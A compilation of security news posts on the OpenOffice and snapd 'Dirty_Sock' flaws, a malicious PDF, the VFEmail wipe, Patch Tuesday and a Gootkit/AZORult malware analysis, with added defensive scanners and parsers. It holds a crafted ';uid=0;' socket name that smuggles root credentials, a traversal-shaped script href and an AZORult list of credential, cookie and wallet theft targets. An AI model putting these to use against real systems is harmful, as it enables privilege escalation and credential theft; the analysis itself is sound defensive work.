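                    "part": part,
                    "event": attrs.get("event-name", ""),
                    "href": href,
                    "traversal": bool(_DOTDOT.search(href)),
                    "python": "language=python" in href.lower(),
                })
    return findings


def is_suspicious(finding: dict) -> bool:
    """A DOM-event listener whose target escapes the document or selects the
    Python script provider warrants a closer look before the file is opened."""
    return finding["event"].startswith("dom:") and (
        finding["traversal"] or finding["python"])


# Constructed hrefs: a traversal-shaped target with placeholder names, and an
# ordinary Basic macro stored inside the document itself.
CRAFTED_HREF = ("vnd.sun.star.script:../../../../PLACEHOLDER_MODULE.py"
                "$PLACEHOLDER_FUNCTION()?language=Python&location=share")
BENIGN_HREF = ("vnd.sun.star.script:Standard.Module1.Main"
               "?language=Basic&location=document")

if __name__ == "__main__":
    for label, href in (("crafted", CRAFTED_HREF), ("benign", BENIGN_HREF)):
        for f in scan_odt(build_sample_odt(href)):
            verdict = "SUSPICIOUS" if is_suspicious(f) else "ok"
            print(f"{label}: {f['event']} -> {f['href']} [{verdict}]")
```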

Although the OpenOffice developers have not yet released a fix for the issue, 0patch experts have released an unofficial patch that addresses the flaw. The micropatch can be applied to the latest version of OpenOffice for Windows.

Patches have also been released for LibreOffice.

0patch also published a video PoC that shows the exploitation of the vulnerability.

This is the second time in a few days that 0patch has released an unofficial patch: earlier this week 0patch experts released a micropatch for an Adobe Reader zero-day that allows malicious PDF documents to call home and send the victim’s NTLM hash.

Pierluigi Paganini

(SecurityAffairs – micropatch, hacking)


Ubuntu snapd flaw allows getting root access to the system.

An expert discovered a privilege escalation vulnerability in default installations of Ubuntu Linux that resides in the snapd API.

Security researcher Chris Moberly discovered a vulnerability in the REST API for Canonical’s snapd daemon that could allow attackers to gain root access on Linux machines.

Canonical, the maker of Ubuntu Linux, promotes its “Snap” packages, which roll all of an application's dependencies into a single binary (similar to Windows applications).

The Snap environment includes an “app store” where developers can contribute and maintain ready-to-go packages.

“Management of locally installed snaps and communication with this online store are partially handled by a systemd service called snapd.”

The flaw, dubbed ‘Dirty_Sock’, affects several Linux systems; the expert successfully tested it on Ubuntu and released PoCs showing how to elevate privileges.

“In January 2019, I discovered a privilege escalation vulnerability in default installations of Ubuntu Linux. This was due to a bug in the snapd API, a default service. Any local user could exploit this vulnerability to obtain immediate root access to the system.” wrote the expert.

“Two working exploits are provided in the dirty_sock repository:

  1. dirty_sockv1: Uses the ‘create-user’ API to create a local user based on details queried from the Ubuntu SSO.
  2. dirty_sockv2: Sideloads a snap that contains an install-hook that generates a new local user.”

“Both are effective on default installations of Ubuntu.”

Canonical has already addressed the flaw; administrators need to install the snapd update to prevent exploitation.

“Chris Moberly discovered that snapd versions 2.28 through 2.37 incorrectly validated and parsed the remote socket address when performing access controls on its UNIX socket.” reads the security advisory published by Canonical.

“A local attacker could use this to access privileged socket APIs and obtain administrator privileges. On Ubuntu systems with snaps installed, snapd typically will have already automatically refreshed itself to snapd 2.37.1 which is unaffected.”

Moberly discovered that the daemon leverages UNIX sockets to allow developers to communicate with it using a REST API.

This UNIX socket runs under the security context of the root user, so the expert investigated the possibility of elevating his privileges by abusing the API methods.

The researcher discovered that it is possible to create a local user account using the daemon’s “POST /v2/create-user” API. This API call requires the caller to have root permissions in order to create a user.

By analysing snapd connections the expert discovered that, to decide whether the caller has root permissions, the daemon uses a string composed of the calling pid, the uid of the program connected to the socket, the socket path, and the RemoteAddr (e.g. “pid=5127;uid=1000;socket=/run/snapd.socket;@”).

Here the “@” substring is the RemoteAddr of the connection, i.e. the name of the client socket used to connect to the snapd socket.

Moberly created a client socket whose name contains “;uid=0;”, so as to trick the parser into overwriting the uid when the string is analysed.


Because “uid=0” appears last in the string, parsing it overwrites the previously parsed uid, tricking snapd into treating the caller as root and allowing a local user to be created.
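The following Python model, added here and not taken from snapd or from the dirty_sock PoCs, reproduces the parsing problem with the string quoted above: a naive parser lets a client-chosen socket name carrying “;uid=0;” override the real uid, while a positional parser that refuses to interpret anything after the socket path does not. The function names and the hardening strategy are this example's own, not Canonical's actual fix.

```python
"""Added example: why a ';'-separated credential string can be fooled by a
client-controlled suffix, and one way to parse it safely. Not snapd's code."""
from dataclasses import dataclass
from typing import Optional

SNAPD_SOCKET = "/run/snapd.socket"


@dataclass
class PeerCreds:
    pid: Optional[int] = None
    uid: Optional[int] = None
    socket: Optional[str] = None


def build_ucred_string(pid: int, uid: int, socket: str, remote_addr: str) -> str:
    """Compose the string the daemon builds from the kernel-supplied peer
    credentials (pid, uid), its own listening socket path and the connection's
    RemoteAddr. Only remote_addr is chosen by the client: it is the name the
    client bound its socket to ('@' when the client socket is unnamed)."""
    return f"pid={pid};uid={uid};socket={socket};{remote_addr}"


def parse_vulnerable(ucred: str) -> PeerCreds:
    """Naive parser: every ';'-separated key=value token is honoured, so the
    last 'uid=' wins even when it arrived inside the client-chosen suffix."""
    creds = PeerCreds()
    for token in ucred.split(";"):
        if token.startswith("pid="):
            creds.pid = int(token[len("pid="):])
        elif token.startswith("uid="):
            creds.uid = int(token[len("uid="):])
        elif token.startswith("socket="):
            creds.socket = token[len("socket="):]
    return creds


def parse_hardened(ucred: str) -> PeerCreds:
    """Positional parser (this example's hardening): the three trusted fields
    must appear once, in order, at the front; the remainder is the RemoteAddr
    and is never interpreted. The socket path is set by the daemon itself, so
    it cannot smuggle a ';' of its own."""
    parts = ucred.split(";", 3)
    if len(parts) != 4:
        raise ValueError("malformed credential string")
    pid_tok, uid_tok, sock_tok, _remote_addr = parts
    for tok, key in ((pid_tok, "pid="), (uid_tok, "uid="), (sock_tok, "socket=")):
        if not tok.startswith(key):
            raise ValueError(f"expected {key!r} field, got {tok!r}")
    pid_val, uid_val = pid_tok[len("pid="):], uid_tok[len("uid="):]
    if not (pid_val.isdigit() and uid_val.isdigit()):
        raise ValueError("pid/uid must be decimal integers")
    return PeerCreds(pid=int(pid_val), uid=int(uid_val),
                     socket=sock_tok[len("socket="):])


def is_root(creds: PeerCreds) -> bool:
    """The access-control decision the daemon makes from the parsed uid."""
    return creds.uid == 0


# The legitimate case from the article: an unprivileged local user (uid 1000)
# connecting through an unnamed client socket.
HONEST = build_ucred_string(5127, 1000, SNAPD_SOCKET, "@")

# Constructed abuse case: the client bound its socket to a path whose name
# itself contains ';uid=0;', so the composed string ends in a second uid field.
CRAFTED = build_ucred_string(5127, 1000, SNAPD_SOCKET, "/tmp/sock;uid=0;")

if __name__ == "__main__":
    for label, s in (("honest", HONEST), ("crafted", CRAFTED)):
        naive, strict = parse_vulnerable(s), parse_hardened(s)
        print(f"{label}: naive uid={naive.uid} root={is_root(naive)}; "
              f"strict uid={strict.uid} root={is_root(strict)}")
```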

The expert published the “dirty_sockv1” PoC code for this attack, but pointed out that it requires an Internet connection, an account on the Ubuntu SSO, and an SSH public key uploaded to that profile.

The expert also devised a Dirty_Sock version 2 that instead sideloads a malicious snap using the ‘POST /v2/snaps’ API.

“dirty_sockv2 instead uses the ‘POST /v2/snaps’ API to sideload a snap containing a bash script that will add a local user. This works on systems that do not have the SSH service running. It also works on newer Ubuntu versions with no Internet connection at all.” continues the expert.

“HOWEVER, sideloading does require some core snap pieces to be there. If they are not there, this exploit may trigger an update of the snapd service.”

Dirty_Sock version 2 requires neither an Internet connection nor an SSH key.

Canonical fixed the issue with the release of version 2.37.1, which implements a stricter parser that removes the user-controlled variable.

Pierluigi Paganini

(SecurityAffairs – Snapd, Ubuntu)


Malicious PDF Analysis

In the last few days I have done some analysis on malicious documents, especially PDF. Then I thought, “Why not turn a PDF analysis into an article?”

Let’s go to our case study:

I received a scan request for a PDF file that had been reported to an antivirus vendor's support, which replied that the file was not malicious. Because the manufacturer’s analysis was not satisfactory, the team responsible for handling the incident requested a second opinion, since other anti-virus tools reported the document as malicious. The team needed evidence to prove the risk involved in the file.

While conducting an initial analysis of the file, I identified something suspicious:

Analysing the structure of the PDF's objects, it is possible to identify a malicious URL that is invoked during the process of opening the document; that is, when the user opens the file on their workstation, the call to the URL is executed covertly, as shown below:

When performing a domain verification it is possible to reach the IP bound to it:

When performing a URL reputation analysis, a malicious history is identified:

When performing an IP reputation analysis, a malicious history is identified:
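The object-structure check described above, as an added example that is not part of the original article: a small Python scanner over raw PDF bytes that looks for open-time triggers and URI/launch actions, resolves PDF name escaping so an obfuscated key is still caught, and extracts the hostnames for the domain and reputation lookups that follow. The sample PDF is constructed for the example and its URL is a placeholder, not an indicator from the case.

```python
"""Added example: static triage of a PDF for a URL requested at open time.
Not the article's code; SAMPLE_PDF and its URL are constructed placeholders."""
import re
from urllib.parse import urlparse

# Keys that make a reader act when the file opens (/OpenAction, /AA) and the
# action types that reach out or execute something.
SUSPICIOUS_KEYS = ("/OpenAction", "/AA", "/URI", "/Launch",
                   "/JavaScript", "/JS", "/SubmitForm")

# Constructed minimal PDF: the catalog's /OpenAction points at a /URI action,
# and the key is written '/Open#41ction' (#41 == 'A') to mimic name escaping,
# which a plain grep for '/OpenAction' would miss.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /Open#41ction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj
4 0 obj << /Type /Action /S /URI /URI (http://malicious.example.invalid/open) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

_NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalise_names(data: bytes) -> bytes:
    """Resolve '#xx' hex escapes so escaped dictionary keys compare equal to
    their plain spelling. Applied to the whole file for triage; that is fine
    here because only key names and literal URIs are inspected afterwards."""
    return _NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def find_suspicious_keys(data: bytes) -> dict:
    """Count each suspicious key. A delimiter must follow the key so that
    '/JS' does not match a longer, unrelated name."""
    norm = normalise_names(data)
    counts = {}
    for key in SUSPICIOUS_KEYS:
        pattern = re.escape(key.encode()) + rb"(?![A-Za-z0-9])"
        n = len(re.findall(pattern, norm))
        if n:
            counts[key] = n
    return counts


def extract_uris(data: bytes) -> list:
    """Literal-string targets of /URI entries, e.g. '/URI (http://...)'."""
    norm = normalise_names(data)
    return [m.decode("latin-1")
            for m in re.findall(rb"/URI\s*\(([^)]*)\)", norm)]


def hosts_for_reputation_lookup(data: bytes) -> set:
    """Hostnames to resolve and check against URL/IP reputation sources."""
    hosts = set()
    for uri in extract_uris(data):
        host = urlparse(uri).hostname
        if host:
            hosts.add(host)
    return hosts


def opens_url_on_open(data: bytes) -> bool:
    """Heuristic verdict: an open-time trigger plus a URI action is present."""
    keys = find_suspicious_keys(data)
    return ("/OpenAction" in keys or "/AA" in keys) and "/URI" in keys


if __name__ == "__main__":
    print("keys:", find_suspicious_keys(SAMPLE_PDF))
    print("uris:", extract_uris(SAMPLE_PDF))
    print("hosts:", hosts_for_reputation_lookup(SAMPLE_PDF))
    print("calls out on open:", opens_url_on_open(SAMPLE_PDF))
```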

The interesting thing is that years ago we would never have said that infection would be possible through malicious code, URLs or shellcode obfuscated inside documents such as PDF, DOC, DOCX, XLS, XLSX and PPT. Security tools must constantly adapt to this new reality of attack and infection.

It is essential that security professionals are increasingly able to perform this type of analysis, which antivirus tools are usually not able to do. I leave here a hint about the importance of studying malicious document analysis.

About the author: Zoziel Freire

Cyber Security Analyst
Content Writer of the portal: www.infosectrain.com
Malicious document analyst
CompTIA Security Analytics Professional
LPIC-3 Enterprise Linux Professional
CompTIA Cybersecurity Analyst
LinkedIn: https://www.linkedin.com/in/zozielfreire/
Twitter: https://twitter.com/zoziel

Pierluigi Paganini

(SecurityAffairs – PDF analysis, hacking)


Hacker deleted all data from VFEmail Servers, including backups

A destructive cyber attack hit the email provider VFEmail: a hacker wiped its servers in the United States, including the backup systems.

An unknown attacker launched a destructive cyber attack against the email provider VFEmail, erasing the data on its servers, including backups; 18 years’ worth of customer emails were lost.

“We have suffered catastrophic destruction at the hands of a hacker. This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can,” reads the statement published by the company on its website.

On Monday, the email provider confirmed that their systems in multiple datacenters were down after a hacker started formatting them.
The company caught the hacker while he was formatting a backup server hosted in the Netherlands. Unfortunately, by that time, the hacker had already managed to erase all disks on every other VFEmail server.

The hacker destroyed all virtual machines, even though the company pointed out that they did not share the same authentication.

“This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy,” VFEmail said. 

The hacker appears to have been attacking out of Bulgaria.


Of course, the attacker could have been using a VPN to hide his real origin.

VFEmail staff recommends that users do not connect their own email clients because the entire content of their accounts was erased by the hacker.

Backups of the servers located in the Netherlands were not affected and were used to restore the service.

The incident suggests a weak cybersecurity posture at the company, which was not able to prevent the intrusion or protect its backups.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)


Microsoft Patch Tuesday updates for February 2019 fixes IE Zero-Day

Microsoft released Patch Tuesday updates for February 2019 that address 77 flaws, including an Internet Explorer issue that has been exploited in attacks.

Microsoft released Patch Tuesday updates for February 2019 that address 77 flaws: 20 rated critical, 54 important and 3 moderate in severity. One of the issues fixed by the tech giant is a zero-day vulnerability in Internet Explorer, discovered by Google, that has been exploited in attacks.

This zero-day, tracked as CVE-2019-0676, is an information disclosure flaw tied to the way Internet Explorer handles objects in memory.

An attacker can exploit the flaw by tricking the victims into visiting a malicious website using a vulnerable version of Internet Explorer. The flaw could be exploited by attackers to test for the presence of files on the targeted device’s disk.

“An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.” reads the security advisory.

“An attacker who successfully exploited this vulnerability could test for the presence of files on disk. For an attack to be successful, an attacker must persuade a user to open a malicious website. The security update addresses the vulnerability by changing the way Internet Explorer handles objects in memory.”

The vulnerability affects Internet Explorer 11; it was reported by Clement Lecigne of Google’s Threat Analysis Group.


Microsoft’s Patch Tuesday updates for February 2019 also addressed several flaws whose details were publicly disclosed before a patch was made available.
The tech giant fixed flaws in Adobe Flash Player, Internet Explorer, Edge, Windows, MS Office, and Office Services and Web Apps, ChakraCore, .NET Framework, Exchange Server, Visual Studio, Azure IoT SDK, Dynamics, Team Foundation Server, and Visual Studio Code.

The list of patched issues includes two critical remote code execution vulnerabilities in SharePoint (CVE-2019-0594 and CVE-2019-0604) and a flaw in Windows DHCP Servers (CVE-2019-0626). The exploitation of these flaws could allow attackers to run arbitrary code and take control of the server.

Pierluigi Paganini

(SecurityAffairs – Kunbus, hacking)


Gootkit: Unveiling the Hidden Link with AZORult

Cybaze-Yoroi ZLAB revealed an interesting hidden connection between the AZORult toolkit and a specific Gootkit payload.

Introduction

In the last few days, a large attack campaign hit several organizations across the Italian cyberspace; as stated in bulletin N020219, the attack waves tried to impersonate legitimate communications from a well-known express courier. However, a deeper analysis by Cybaze-Yoroi ZLAB revealed interesting hidden aspects, spotting a connection between the AZORult toolkit and a particular Gootkit payload.

Technical analysis

Stage 1 – The Attached Javascript

Most of the infection attempts started with a particular email attachment: a compressed archive containing stealthy JavaScript code, which in most cases was able to evade antivirus detection during the initial stages of the campaign.

Hash: 12791e14ba82d36d434e7c7c0b81c7975ce802a430724f134b7e0cce5a7bb185
Threat: malicious js
Description: Obfuscated malicious JS. It downloads the first component and keeps communicating with the C2 server.

Table 1: Generic information about the malicious js file

This JS file is an obfuscated dropper whose purpose is to download another component from a “safe” remote location:

Figure 1: Snippet from the JavaScript attachment

It contacts two distinct servers, googodsgld[.]com and driverconnectsearch[.]info. The behaviour of this kind of JavaScript stager is as simple as it is interesting: it downloads other executable code able to do virtually anything the attacker wants. This pattern and the simplicity of the code itself loosely resemble the Brushaloader threat, a known dropper/stager written in VBScript that contacts its remote infrastructure in a similar manner. We can hypothesize that the malware writers may have emulated the Brushaloader stager functionality, creating a sort of custom version exploiting the same mechanism.

Figure 2: Classic Brushaloader sample (left) along with the recent Javascript stager (right)
Figure 3: Encrypted communication with driverconnectsearch[.]info server

After the first contact attempt to googodsgld[.]com, the script communicates with the other destination and retrieves a Cabinet archive encoded within the chunk of executable JavaScript code returned by driverconnectsearch[.]info. It then stores it in “%APPDATA%\Local\Temp\”.

As shown in Figure 3, the first characters of the encoded payload string are “TVNDRg”, which decodes to “MSCF”: the standard header of the Microsoft Cabinet compressed file format.

Figure 4: JavaScript downloaded from driverconnectsearch[.]info server.
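As an added example (not part of the Cybaze-Yoroi analysis), the Python below generalises the “TVNDRg” observation: for each known file magic it derives every base64 prefix a blob beginning with that magic can have (the last character is only partly fixed by the magic bytes), then scans script text for base64 runs with such a prefix and decodes them to confirm. The JavaScript sample and the CAB-like blob inside it are constructed.

```python
"""Added example: recognise a base64-encoded archive or executable embedded in
downloaded script text by its encoded magic. Not the analysts' code; the
sample script and the CAB-like blob below are constructed."""
import base64
import re

B64_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

# File signatures worth recognising in a dropper's response body.
MAGICS = {
    b"MSCF": "Microsoft Cabinet archive",
    b"MZ": "PE executable",
    b"PK\x03\x04": "ZIP archive",
    b"%PDF": "PDF document",
}

# A run of base64 text long enough to be a payload rather than a token.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def base64_prefixes(magic: bytes) -> set:
    """All base64 strings a blob beginning with `magic` can start with.

    Each base64 character carries 6 bits, so len(magic)*8 bits fix
    len(magic)*8 // 6 whole characters; the leftover bits fix only the top
    bits of the next character, leaving 2**(6 - leftover) candidates."""
    nbits = len(magic) * 8
    full = nbits // 6
    leftover = nbits - full * 6
    head = base64.b64encode(magic).decode()[:full]
    if leftover == 0:
        return {head}
    low_bits = int.from_bytes(magic, "big") & ((1 << leftover) - 1)
    top = low_bits << (6 - leftover)
    return {head + B64_ALPHABET[top + i] for i in range(1 << (6 - leftover))}


PREFIX_TABLE = {magic: base64_prefixes(magic) for magic in MAGICS}


def find_encoded_blobs(text: str) -> list:
    """Locate base64 runs whose prefix matches a known magic, decode them and
    keep only those whose bytes really start with that magic."""
    hits = []
    for m in B64_RUN.finditer(text):
        run = m.group(0)
        for magic, label in MAGICS.items():
            if not any(run.startswith(p) for p in PREFIX_TABLE[magic]):
                continue
            try:
                raw = base64.b64decode(run + "=" * (-len(run) % 4), validate=True)
            except ValueError:  # binascii.Error is a ValueError
                continue
            if raw.startswith(magic):
                hits.append({"offset": m.start(), "type": label,
                             "prefix": run[:6], "size": len(raw)})
    return hits


# Constructed stand-in for the downloaded script: a short benign base64 string
# and a CAB-like blob (valid 'MSCF' signature, zero-filled body, 64 bytes).
FAKE_CAB = b"MSCF" + b"\x00" * 4 + (64).to_bytes(4, "little") + b"\x00" * 52
SAMPLE_JS = (
    'var note = "' + base64.b64encode(b"hello world, this is just text").decode() + '";\n'
    'var payload = "' + base64.b64encode(FAKE_CAB).decode() + '";\n'
    "// a real stager would now decode payload and write it under %APPDATA%\n"
)

if __name__ == "__main__":
    print("MSCF prefixes:", sorted(base64_prefixes(b"MSCF")))
    for hit in find_encoded_blobs(SAMPLE_JS):
        print(hit)
```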

Stage 2 – The Cabinet

Actually, this .CAB archive is just a shell for a PE32 executable file: 

Hash: 2274174ed24425f41362aa207168b491e6fb55cab208116070f91c049946097a
Threat: RuntimeBroker5.exe
Description: First component downloaded by the malicious js file.

Table 2: Generic information about RuntimeBroker5.exe (AZORult)

When executed, the RuntimeBroker5.exe sample behaves as another dropper: it downloads two other components from the remote server “hairpd[.]com”.

Figure 5: RuntimeBroker5.exe process execution

The sample does not only perform this download. Here is one of the key points of the article: it also establishes a communication channel with the AZORult C2 host “ssl[.]admin[.]itybuy[.]it”.

The network packets exchanged with the server confirm this identification, owing to the known communication patterns, and the dynamic analysis also shows info-stealing behaviours compatible with the identified threat.

As shown in the following figure, the files written in the “%APPDATA%\Local\Temp\” path closely match the AZORult analysis published by the Unit42 research group.

Figure 6: Evidence of the similarity of RuntimeBroker5.exe and AZORult malware variant analyzed by UNIT42
Figure 7: C2 Communication comparison

During the dynamic analysis, the RuntimeBroker5.exe sample received a sort of configuration file from the C2 server. We extracted it from the running malware image and decoded it:

  1. firefox.exe
  2. SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
  3. SOFTWARE\Mozilla\Mozilla Firefox
  4. SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command
  5. SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
  6. %appdata%\Mozilla\Firefox\Profiles\
  7. MozillaFireFox
  8. CurrentVersion
  9. Install_Directory
  10. nss3.dll
  11. thunderbird.exe
  12. SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
  13. SOFTWARE\Mozilla\Mozilla Thunderbird
  14. SOFTWARE\Classes\ThunderbirdEML\DefaultIcon
  15. %appdata%\Thunderbird\Profiles\
  16. ThunderBird
  17. SELECT host, path, isSecure, expiry, name, value FROM moz_cookies
  18. SELECT fieldname, value FROM moz_formhistory
  19. NSS_Init
  20. PK11_GetInternalKeySlot
  21. PK11_Authenticate
  22. PK11SDR_Decrypt
  23. NSS_Shutdown
  24. PK11_FreeSlot
  25. logins.json
  26. logins
  27. hostname
  28. timesUsed
  29. encryptedUsername
  30. encryptedPassword
  31. cookies.sqlite
  32. formhistory.sqlite
  33. %LOCALAPPDATA%\Google\Chrome\User Data\
  34. %LOCALAPPDATA%\Google\Chrome SxS\User Data\
  35. %LOCALAPPDATA%\Xpom\User Data\
  36. %LOCALAPPDATA%\Yandex\YandexBrowser\User Data\
  37. %LOCALAPPDATA%\Comodo\Dragon\User Data\
  38. %LOCALAPPDATA%\Amigo\User Data\
  39. %LOCALAPPDATA%\Orbitum\User Data\
  40. %LOCALAPPDATA%\Bromium\User Data\
  41. %LOCALAPPDATA%\Chromium\User Data\
  42. %LOCALAPPDATA%\Nichrome\User Data\
  43. %LOCALAPPDATA%\RockMelt\User Data\
  44. %LOCALAPPDATA%\360Browser\Browser\User Data\
  45. %LOCALAPPDATA%\Vivaldi\User Data\
  46. %APPDATA%\Opera Software\
  47. %LOCALAPPDATA%\Go!\User Data\
  48. %LOCALAPPDATA%\Sputnik\Sputnik\User Data\
  49. %LOCALAPPDATA%\Kometa\User Data\
  50. %LOCALAPPDATA%\uCozMedia\Uran\User Data\
  51. %LOCALAPPDATA%\QIP Surf\User Data\
  52. %LOCALAPPDATA%\Epic Privacy Browser\User Data\
  53. %APPDATA%\brave\
  54. %LOCALAPPDATA%\CocCoc\Browser\User Data\
  55. %LOCALAPPDATA%\CentBrowser\User Data\
  56. %LOCALAPPDATA%\7Star\7Star\User Data\
  57. %LOCALAPPDATA%\Elements Browser\User Data\
  58. %LOCALAPPDATA%\TorBro\Profile\
  59. %LOCALAPPDATA%\Suhba\User Data\
  60. %LOCALAPPDATA%\Safer Technologies\Secure Browser\User Data\
  61. %LOCALAPPDATA%\Rafotech\Mustang\User Data\
  62. %LOCALAPPDATA%\Superbird\User Data\
  63. %LOCALAPPDATA%\Chedot\User Data\
  64. %LOCALAPPDATA%\Torch\User Data\
  65. GoogleChrome
  66. GoogleChrome64
  67. InternetMailRu
  68. YandexBrowser
  69. ComodoDragon
  70. Amigo
  71. Orbitum
  72. Bromium
  73. Chromium
  74. Nichrome
  75. RockMelt
  76. 360Browser
  77. Vivaldi
  78. Opera
  79. GoBrowser
  80. Sputnik
  81. Kometa
  82. Uran
  83. QIPSurf
  84. Epic
  85. Brave
  86. CocCoc
  87. CentBrowser
  88. 7Star
  89. ElementsBrowser
  90. TorBro
  91. Suhba
  92. SaferBrowser
  93. Mustang
  94. Superbird
  95. Chedot
  96. Torch
  97. Login Data
  98. Web Data
  99. SELECT origin_url, username_value, password_value FROM logins
  100. SELECT host_key, name, encrypted_value, value, path, secure, (expires_utc/1000000)-11644473600 FROM cookies
  101. SELECT host_key, name, name, value, path, secure, expires_utc FROM cookies
  102. SELECT name, value FROM autofill
  103. SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted value FROM credit_cards
  104. %APPDATA%\Microsoft\Windows\Cookies\
  105. %APPDATA%\Microsoft\Windows\Cookies\Low\
  106. %LOCALAPPDATA%\Microsoft\Windows\INetCache\
  107. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\
  108. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\
  109. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\
  110. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\
  111. InternetExplorer
  112. InternetExplorerLow
  113. InternetExplorerINetCache
  114. MicrosoftEdge_AC_INetCookies
  115. MicrosoftEdge_AC_001
  116. MicrosoftEdge_AC_002
  117. MicrosoftEdge_AC
  118. Software\Microsoft\Internet Explorer
  119. Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  120. Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
  121. Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
  122. Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
  123. POP3
  124. IMAP
  125. SMTP
  126. HTTP
  127. %appdata%\Waterfox\Profiles\
  128. Waterfox
  129. %appdata%\Comodo\IceDragon\Profiles\
  130. IceDragon
  131. %appdata%\8pecxstudios\Cyberfox\Profiles\
  132. Cyberfox
  133. sqlite3_open
  134. sqlite3_close
  135. sqlite3_prepare_v2
  136. sqlite3_step
  137. sqlite3_column_text
  138. sqlite3_column_bytes
  139. sqlite3_finalize
  140. %APPDATA%\filezilla\recentservers.xml
  141. <RecentServers>
  142. </RecentServers>
  143. <Server>
  144. </Server>
  145. <Host>
  146. </Host>
  147. <Port>
  148. </Port>
  149. <User>
  150. </User>
  151. <Pass>
  152. </Pass>
  153. <Pass encoding="base64">
  154. FileZilla
  155. ole32.dll
  156. CLSIDFromString
  157. {4BF4C442-9B8A-41A0-B380-DD4A704DDB28}
  158. {3CCD5499-87A8-4B10-A215-608888DD3B55}
  159. vaultcli.dll
  160. VaultOpenVault
  161. VaultEnumerateItems
  162. VaultGetItem
  163. MicrosoftEdge
  164. Browsers\AutoComplete
  165. CookieList.txt
  166. SELECT host_key, name, encrypted_value, value, path, is_secure, (expires_utc/1000000)-11644473600 FROM cookies
  167. %appdata%\Moonchild Productions\Pale Moon\Profiles\
  168. PaleMoon
  169. %appdata%\Electrum\wallets\
  170. \Electrum
  171. %appdata%\Electrum-LTC\wallets\
  172. \Electrum-LTC
  173. %appdata%\ElectrumG\wallets\
  174. \ElectrumG
  175. %appdata%\Electrum-btcp\wallets\
  176. \Electrum-btcp
  177. %APPDATA%\Ethereum\keystore\
  178. \Ethereum
  179. %APPDATA%\Exodus\
  180. \Exodus
  181. \Exodus Eden
  182. *.json,*.seco
  183. %APPDATA%\Jaxx\Local Storage\
  184. \Jaxx\Local Storage\
  185. %APPDATA%\MultiBitHD\
  186. \MultiBitHD
  187. mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml
  188. .wallet
  189. wallets\.wallet
  190. wallet.dat
  191. wallets\wallet.dat
  192. electrum.dat
  193. wallets\electrum.dat
  194. Software\monero-project\monero-core
  195. wallet_path
  196. Bitcoin\Bitcoin-Qt
  197. BitcoinGold\BitcoinGold-Qt
  198. BitCore\BitCore-Qt
  199. Litecoin\Litecoin-Qt
  200. BitcoinABC\BitcoinABC-Qt
  201. %APPDATA%\Exodus Eden\
  202. %Appdata%\Psi+\profiles\
  203. %Appdata%\Psi\profiles\
  204. <roster-cache>
  205. </roster-cache>
  206. <jid type="QString">
  207. <password type="QString">
  208. </password>

Table 3: AZORult Configuration file

The multiple references to browser cookies and crypto wallets confirm that the “RuntimeBroker5.exe” sample, initially hidden in the cabinet archive, is an AZORult variant.

Stage 3 – The Payload

The other file downloaded from hairpd[.]com by the AZORult sample is another PE32 executable.

Figure 8: GET request to download the payload.
Hash: a75b318eb2ae6678fd15f252d6b33919203262eb59e08ac32928f8bad54ca612
Threat: sputik.exe
Short description: Second component downloaded by the malware. This component stays alive after the infection.

Table 4: Generic information about sputik.exe (Gootkit)

The “sputik.exe” sample uses a set of evasion techniques to avoid monitoring of the process, such as invoking the “UuidCreateSequential” API to detect MAC addresses typical of virtual machines; this check can be easily bypassed by spoofing the MAC address of a real network card.

Figure 9: Evasion technique through the check “UuidCreateSequential” API call

Bypassing all the evasion techniques reveals the nature of the payload: a Gootkit malware implant.

Figure 10: Command line of the final sample

By instrumenting the execution of the implant, we were able to extract part of the malware's JavaScript code. The Gootkit implant consists of several modules written on top of NodeJS and embedded into the PE file, and the extraction revealed part of the implant code.

Figure 11: Portion of Gootkit code snippet

In past years, Gootkit source code has been leaked online, and part of it is also available on the GitHub platform. This allowed us to investigate the differences between the extracted snippets and the known, previously leaked, version of the malware.

Figure 12: Comparison between extracted Gootkit version and the leaked one

As a general consideration, we noticed many similarities between the two code bases; they are perfectly compatible, but a few differences remain. For instance, private keys and certificates have been modified, showing that the malware author chose a stronger key.

Table 5: Certificate comparison (new on the left, known/leaked on the right)

Conclusion

These attack waves targeting Italian organizations and users revealed interesting connections between two threats we were used to monitoring and detecting across both the InfoSec community and CERT-Yoroi’s constituency, revealing a hidden link between this particular AZORult instance and the Gootkit implant.

The analysis also pointed to an evolution of the dropping techniques used by cyber-criminals in the initial stages of the attacks, showing how the use of extremely flexible stagers written in high-level languages, JavaScript in this case, is becoming more popular and needs to be carefully monitored.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis published on the Yoroi Blog.

Pierluigi Paganini

(SecurityAffairs – AZORult, gootkit)

The post Gootkit: Unveiling the Hidden Link with AZORult appeared first on Security Affairs.



